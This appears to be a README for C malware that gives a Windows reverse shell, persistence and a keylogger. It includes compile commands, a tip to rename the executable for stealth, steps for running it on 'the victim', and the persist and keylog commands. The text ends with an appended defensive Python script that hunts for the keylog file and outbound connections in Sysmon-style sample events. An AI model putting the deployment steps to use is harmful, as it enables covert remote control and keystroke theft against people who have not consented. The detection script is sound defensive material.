DISCLAIMER: this project should be used only for educational purposes. You should not use it on a victim without written consent.
This project is malware written in C that allows you to get a shell on a Windows victim, execute Windows commands, and obtain persistence. It also acts as a keylogger.
On your Linux machine, compile the client and the server (don't forget to change the IPs and the port):
gcc server.c -o server
i686-w64-mingw32-gcc -o Driver.exe client.c -lwsock32 -lwininet
You can change the name of the .exe file. For stealthiness, choose something that doesn't attract attention.
- Transfer the file server.exe to the target machine.
- Start your server with the arguments: port and IP of your attack machine.
./server <ip> <port>
- Execute the malicious file on the target machine (you can double-click the executable).
.\Driver.exe
Check your Linux terminal. You now have a shell!
You can execute all of the Windows commands, as well as:
persist
This establishes persistence: if the victim logs out or turns off the machine, the client connects back to you when they come back online.
keylog
This will start a keylogger that will save everything the victim types (it is saved in C:\tmp\windows.txt).
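For defenders, the two behaviours described above (a client that connects out to the operator, and a keylog file at C:\tmp\windows.txt) can be correlated in endpoint telemetry. The following Python is an added example, not part of this project's code; the events are constructed samples that use Sysmon field names (Event ID 3, network connection; Event ID 11, file create), and the process names, GUIDs, IPs and ports in them are assumptions.

```python
import json
import ntpath
from collections import defaultdict

# Path the README gives for the keylogger output (matched case-insensitively).
KEYLOG_PATH = r"c:\tmp\windows.txt"

# Constructed sample events, one JSON object per line, using Sysmon field
# names. Process names, GUIDs, IPs and ports are made up for this example.
SAMPLE_EVENTS = r"""
{"EventID": 3, "ProcessGuid": "{A1}", "Image": "C:\\Users\\bob\\Downloads\\Driver.exe", "Initiated": "true", "DestinationIp": "203.0.113.10", "DestinationPort": 4444}
{"EventID": 11, "ProcessGuid": "{A1}", "Image": "C:\\Users\\bob\\Downloads\\Driver.exe", "TargetFilename": "C:\\TMP\\Windows.txt"}
{"EventID": 11, "ProcessGuid": "{B2}", "Image": "C:\\Windows\\System32\\notepad.exe", "TargetFilename": "C:\\Users\\bob\\notes\\windows.txt"}
{"EventID": 3, "ProcessGuid": "{C3}", "Image": "C:\\Program Files\\Browser\\browser.exe", "Initiated": "true", "DestinationIp": "198.51.100.7", "DestinationPort": 443}
{"EventID": 11, "ProcessGuid": "{D4}", "Image": "C:\\Tools\\backup.exe", "TargetFilename": "C:/tmp/windows.txt"}
"""


def normalize(path):
    """Lower-case a Windows path and unify separators for comparison."""
    return ntpath.normpath(path).lower()


def hunt(lines):
    """Find processes that created the keylog file; rate higher if the same
    process also initiated an outbound connection (the reverse-shell side)."""
    outbound = defaultdict(set)   # ProcessGuid -> {(ip, port)}
    writers = {}                  # ProcessGuid -> Image
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        guid = ev["ProcessGuid"]
        if ev["EventID"] == 3 and ev.get("Initiated") == "true":
            outbound[guid].add((ev["DestinationIp"], ev["DestinationPort"]))
        elif ev["EventID"] == 11 and normalize(ev["TargetFilename"]) == KEYLOG_PATH:
            writers[guid] = ev["Image"]
    return [
        {"image": image,
         "outbound": sorted(outbound[guid]),
         "severity": "high" if outbound[guid] else "medium"}
        for guid, image in writers.items()
    ]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS.splitlines()):
        print(finding)
```

Because the client is built from source, the output path can differ between builds, so a match is a lead to investigate rather than a complete detection.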
Special thanks to Aleksa Tamburkovski.